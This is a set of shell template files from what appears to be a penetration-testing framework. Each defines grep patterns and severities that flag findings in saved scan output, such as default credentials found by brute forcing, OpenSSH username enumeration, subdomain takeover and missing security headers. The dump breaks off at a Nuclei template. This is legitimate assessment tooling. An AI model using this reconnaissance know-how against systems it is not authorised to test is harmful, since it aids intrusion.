| GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/passive/network/CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2018-15473 - OpenSSH Username Enumeration' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_enumusers.txt" 4 | MATCH="\[+\]" 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/Default_Credentials_BruteX.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Default Credentials - BruteX' 3 | FILENAME="$LOOT_DIR/credentials/brutex-$TARGET.txt $LOOT_DIR/credentials/brutex-$TARGET-*.txt" 4 | MATCH="password\:\ " 5 | SEVERITY='P1 - CRITICAL' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/Default_Credentials_NMap.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Default Credentials - NMap' 3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt" 4 | MATCH="Valid\ credentials" 5 | SEVERITY='P1 - CRITICAL' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/Interesting_Domain_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Interesting Domain Found' 3 | echo "$TARGET" > /tmp/target 4 | FILENAME="/tmp/target" 5 | MATCH="admin|dev|portal|stage|prod|tst|test" 6 | SEVERITY='P5 - INFO' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | TYPE='network' -------------------------------------------------------------------------------- /templates/passive/network/Lack_of_SPF_DNS_Record.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Lack of SPF DNS Record' 3 | FILENAME="$LOOT_DIR/nmap/email-$TARGET.txt" 4 | MATCH="\[\+\]\ Spoofing\ possible" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE='network' -------------------------------------------------------------------------------- /templates/passive/network/Possible_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Possible Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/takeovers-$TARGET.txt" 4 | MATCH='anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp|azure|trafficmanager|netifly|brandpa' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE='network' -------------------------------------------------------------------------------- /templates/passive/network/SMB_Info_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SMB Info Disclosure' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-port139.txt $LOOT_DIR/output/msf-$TARGET-port445.txt" 4 | MATCH="\[\+\]" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" 10 | -------------------------------------------------------------------------------- /templates/passive/network/SMBv1_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SMBv1 Enabled' 3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET-*.txt" 4 | MATCH="SMBv1" 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/SSH_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='SSH Version Disclosure' 3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_version.txt" 4 | MATCH="\[\+\]" 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" 10 | -------------------------------------------------------------------------------- /templates/passive/network/Subjack_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Subjack Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/subjack-$TARGET.txt" 4 | MATCH="\[Vulnerable\]" 5 | SEVERITY='P2 - HIGH' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/Subover_Takeover_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Subover Takeover Detected' 3 | FILENAME="$LOOT_DIR/nmap/subover-$TARGET.txt" 4 | MATCH="Takeover\ Possible" 5 | SEVERITY='P2 - HIGH' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | TYPE="network" -------------------------------------------------------------------------------- /templates/passive/network/recursive/Component_With_Known_Vulnerabilities_-_NMap.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Component With Known Vulnerabilities - NMap' 3 | FILENAME="$LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="vulners.com" 6 | GREP_OPTIONS='-ih' 7 | TYPE="network" 8 | 9 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$5=AWK_TARGET{print "P3 - MEDIUM, Components with Known Vulnerabilities - NMap, " $5 ", " $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 11 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/network/recursive/Interesting_Ports_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Interesting Ports Found' 3 | FILENAME="$LOOT_DIR/nmap/ports-$TARGET.txt" 4 | MATCH="21\ |22\ |23\ |137\ |139\ |445\ |8080\ |8443\ |3306\ |5900\ |53\ |8081\ |5432\ " 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SECONDARY_COMMANDS='' 8 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 9 | TYPE='network' 10 | 11 | rm -f /tmp/match.out 2> /dev/null 12 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null | head -n 1 2> /dev/null > /tmp/match.out 13 | 14 | CHARS="$(wc -c /tmp/match.out 2> /dev/null | awk '{print $1}' 2> /dev/null)" 15 | if [[ $CHARS > 0 ]]; then 16 | echo "$SEVERITY, $VULN_NAME, $TARGET, $(cat /tmp/match.out 2> /dev/null)" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 17 | # /bin/bash "$INSTALL_DIR/bin/slack.sh" "[+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out | tr '\n' ' ') (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 18 | #echo "•?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 19 | else 20 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 21 | fi 22 | 23 | rm -f /tmp/match.out 2> /dev/null 24 | -------------------------------------------------------------------------------- /templates/passive/web/Autocomplete_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Autocomplete Enabled' 3 | FILENAME="$LOOT_DIR/web/websource-htt*-$TARGET-*.txt" 4 | MATCH='autocomplete=\"on\"' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/CORS_Policy_-_Allow-Credentials_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CORS Policy - Allow-Credentials Enabled' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH='Access-Control-Allow-Credentials: true' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/CORS_Policy_-_Allow-Origin_Wildcard.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CORS Policy - Allow-Origin Wildcard' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH='Access-Control-Allow-Origin: *' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/CSP_Not_Enforced.sh: -------------------------------------------------------------------------------- 1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then 2 | if [ "$SSL" = "true" ]; then 3 | AUTHOR='@xer0dayz' 4 | VULN_NAME='CSP Not Enforced' 5 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 6 | MATCH="content-security-policy" 7 | SEVERITY='P5 - INFO' 8 | GREP_OPTIONS='-i' 9 | SEARCH='negative' 10 | SECONDARY_COMMANDS='' 11 | URI="" 12 | else 13 | AUTHOR='@xer0dayz' 14 | VULN_NAME='CSP Not Enforced' 15 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 16 | MATCH="content-security-policy" 17 | SEVERITY='P5 - INFO' 18 | GREP_OPTIONS='-i' 19 | SEARCH='negative' 20 | SECONDARY_COMMANDS='' 21 | URI="" 22 | fi 23 | fi -------------------------------------------------------------------------------- /templates/passive/web/Clear-text_Communications_HTTP.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "false" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Clear-Text Protocol - HTTP' 4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt" 5 | MATCH="200\ OK" 6 | SEVERITY='P2 - HIGH' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | fi -------------------------------------------------------------------------------- /templates/passive/web/Clickjacking.sh: -------------------------------------------------------------------------------- 1 | if [ -f $LOOT_DIR/web/headers-http-$TARGET.txt ]; then 2 | if [ "$SSL" = "false" ]; then 3 | AUTHOR='@xer0dayz' 4 | VULN_NAME='Clickjacking HTTP' 5 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" 6 | MATCH="x-frame-options" 7 | SEVERITY='P4 - LOW' 8 | GREP_OPTIONS='-i' 9 | SEARCH='negative' 10 | SECONDARY_COMMANDS='' 11 | URI="" 12 | else 13 | AUTHOR='@xer0dayz' 14 | VULN_NAME='Clickjacking HTTPS' 15 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 16 | MATCH="x-frame-options" 17 | SEVERITY='P4 - LOW' 18 | GREP_OPTIONS='-i' 19 | SEARCH='negative' 20 | SECONDARY_COMMANDS='' 21 | URI="" 22 | fi 23 | fi -------------------------------------------------------------------------------- /templates/passive/web/Drupal_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH="X\-Generator\:\ Drupal\ " 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/Expired_SSL_Certificate.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Expired SSL Certificate' 3 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET-*.txt" 4 | MATCH='certificate has expired' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH="Server\:\ xxxxxxxx-xxxxx" 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/Insecure_Cookie_-_HTTPOnly_Not_Set.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Insecure Cookie - HTTPOnly Not Set' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH='Set-Cookie' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS=' | egrep -iv httponly' -------------------------------------------------------------------------------- /templates/passive/web/Insecure_Cookie_-_Secure_Not_Set.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Insecure Cookie - Secure Not Set' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH='Set-Cookie' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS=' | egrep -iv secure' -------------------------------------------------------------------------------- /templates/passive/web/Insecure_SSL_TLS_Connection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Weak SSL TLS Protocols' 3 | FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt $LOOT_DIR/web/sslscan-$TARGET-*.txt" 4 | MATCH="SSLv* enabled" 5 | SEVERITY='P2 - HIGH' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/Insecure_SSL_TLS_Connection_CN_Mismatch.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Insecure SSL TLS Connection CN Mismatch' 3 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt" 4 | MATCH='failed to verify the legitimacy of the server' 5 | SEVERITY='P3 - MEDIUM' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' 9 | URI="/" 10 | -------------------------------------------------------------------------------- /templates/passive/web/Interesting_Title_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Interesting Title Found' 3 | FILENAME="$LOOT_DIR/web/title-htt*-$TARGET-*.txt" 4 | MATCH='admin|dev|portal|login|sign|signup|registration|account' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/Server_Header_Disclosure.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "false" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Server Header Disclosure - HTTP' 4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt" 5 | MATCH="Server\:" 6 | SEVERITY='P5 - INFO' 7 | GREP_OPTIONS='-i' 8 | SEARCH='positive' 9 | SECONDARY_COMMANDS='' 10 | else 11 | AUTHOR='@xer0dayz' 12 | VULN_NAME='Server Header Disclosure - HTTPS' 13 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET-*.txt" 14 | MATCH="Server\:" 15 | SEVERITY='P5 - INFO' 16 | GREP_OPTIONS='-i' 17 | SEARCH='positive' 18 | SECONDARY_COMMANDS='' 19 | fi -------------------------------------------------------------------------------- /templates/passive/web/Strict_Tranposrt_Security_Not_Enforced.sh: -------------------------------------------------------------------------------- 1 | if [ "$SSL" = "true" ]; then 2 | AUTHOR='@xer0dayz' 3 | VULN_NAME='Strict Tranposrt Security Not Enforced' 4 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt" 5 | MATCH="strict-transport-security" 6 | SEVERITY='P4 - LOW' 7 | GREP_OPTIONS='-i' 8 | SEARCH='negative' 9 | SECONDARY_COMMANDS='' 10 | else 11 | break 12 | fi -------------------------------------------------------------------------------- /templates/passive/web/Trace_Method_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='TRACE Method Enabled' 3 | FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt" 4 | MATCH='TRACE' 5 | SEVERITY='P4 - LOW' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/X-Powered-By_Header_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='X-Powered-By Header Found' 3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt" 4 | MATCH='X-Powered-By' 5 | SEVERITY='P5 - INFO' 6 | GREP_OPTIONS='-i' 7 | SEARCH='positive' 8 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/passive/web/recursive/Arachni_Vulnerability_Scan.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Arachni Vulnerability Scan' 3 | FILENAME="${LOOT_DIR}/web/arachni_webscan_${TARGET}_*.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | 6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 7 | rm -f /tmp/report.txt 2> /dev/null 8 | touch /tmp/report.txt 2> /dev/null 9 | x=0 10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null 11 | 12 | # DELETE FIRST LINE 13 | sed -i '1d' /tmp/out 2> /dev/null 14 | 15 | cat /tmp/out 2> /dev/null | while read line; do 16 | x=$(( x+1 )) 17 | if [ $x -eq "1" ]; then 18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 19 | elif [ $x -eq "2" ]; then 20 | if [[ $line =~ .*Critical.* ]]; then 21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 22 | elif [[ $line =~ .*High.* ]]; then 23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 24 | elif [[ $line =~ .*Medium.* ]]; then 25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 26 | elif [[ $line =~ .*Low.* ]]; then 27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 28 | elif [[ $line =~ .*Informational.* ]]; then 29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 30 | fi 31 | elif [ $x -eq "3" ]; then 32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 33 | elif [ $x -eq "4" ]; then 34 | echo "$line" >> /tmp/report.txt 2> /dev/null 35 | x=0 36 | fi 37 | done 38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTP.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Arachni Vulnerability Scan - HTTP' 3 | FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-http.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | 6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 7 | rm -f /tmp/report.txt 2> /dev/null 8 | touch /tmp/report.txt 2> /dev/null 9 | x=0 10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null 11 | 12 | # DELETE FIRST LINE 13 | sed -i '1d' /tmp/out 2> /dev/null 14 | 15 | cat /tmp/out 2> /dev/null | while read line; do 16 | x=$(( x+1 )) 17 | if [ $x -eq "1" ]; then 18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 19 | elif [ $x -eq "2" ]; then 20 | if [[ $line =~ .*Critical.* ]]; then 21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 22 | elif [[ $line =~ .*High.* ]]; then 23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 24 | elif [[ $line =~ .*Medium.* ]]; then 25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 26 | elif [[ $line =~ .*Low.* ]]; then 27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 28 | elif [[ $line =~ .*Informational.* ]]; then 29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 30 | fi 31 | elif [ $x -eq "3" ]; then 32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 33 | elif [ $x -eq "4" ]; then 34 | echo "$line" >> /tmp/report.txt 2> /dev/null 35 | x=0 36 | fi 37 | done 38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTPS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Arachni Vulnerability Scan - HTTPS' 3 | FILENAME="$LOOT_DIR/web/arachni-$TARGET-webscan-https.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | 6 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 7 | rm -f /tmp/report.txt 2> /dev/null 8 | touch /tmp/report.txt 2> /dev/null 9 | x=0 10 | cat $FILENAME 2> /dev/null | egrep 'Proof\:|URL\:|Severity\:|\[\+\]\ \[' | sed 's/\n//g' | sed -r 's/</\&lh\;/g' | awk '{print $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15}' 2> /dev/null | tr -d '"' > /tmp/out 2> /dev/null 11 | 12 | # DELETE FIRST LINE 13 | sed -i '1d' /tmp/out 2> /dev/null 14 | 15 | cat /tmp/out 2> /dev/null | while read line; do 16 | x=$(( x+1 )) 17 | if [ $x -eq "1" ]; then 18 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 19 | elif [ $x -eq "2" ]; then 20 | if [[ $line =~ .*Critical.* ]]; then 21 | echo "P1 - CRITICAL," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 22 | elif [[ $line =~ .*High.* ]]; then 23 | echo "P2 - HIGH," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 24 | elif [[ $line =~ .*Medium.* ]]; then 25 | echo "P3 - MEDIUM," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 26 | elif [[ $line =~ .*Low.* ]]; then 27 | echo "P4 - LOW," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 28 | elif [[ $line =~ .*Informational.* ]]; then 29 | echo "P5 - INFO," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 30 | fi 31 | elif [ $x -eq "3" ]; then 32 | echo "$line," | tr -d '\n' >> /tmp/report.txt 2> /dev/null 33 | elif [ $x -eq "4" ]; then 34 | echo "$line" >> /tmp/report.txt 2> /dev/null 35 | x=0 36 | fi 37 | done 38 | cat /tmp/report.txt 2> /dev/null | awk -F',' '{print $2 ", " $1 ", " $3 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 39 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTP.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Nikto Vulnerability Scan - HTTP' 3 | FILENAME="$LOOT_DIR/web/nikto-$TARGET-http-port80.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="\+" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTPS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Nikto Vulnerability Scan - HTTPS' 3 | FILENAME="$LOOT_DIR/web/nikto-$TARGET-https-port443.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="\+" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | grep -v "Target\ " | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nikto Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTP.sh: -------------------------------------------------------------------------------- 1 | 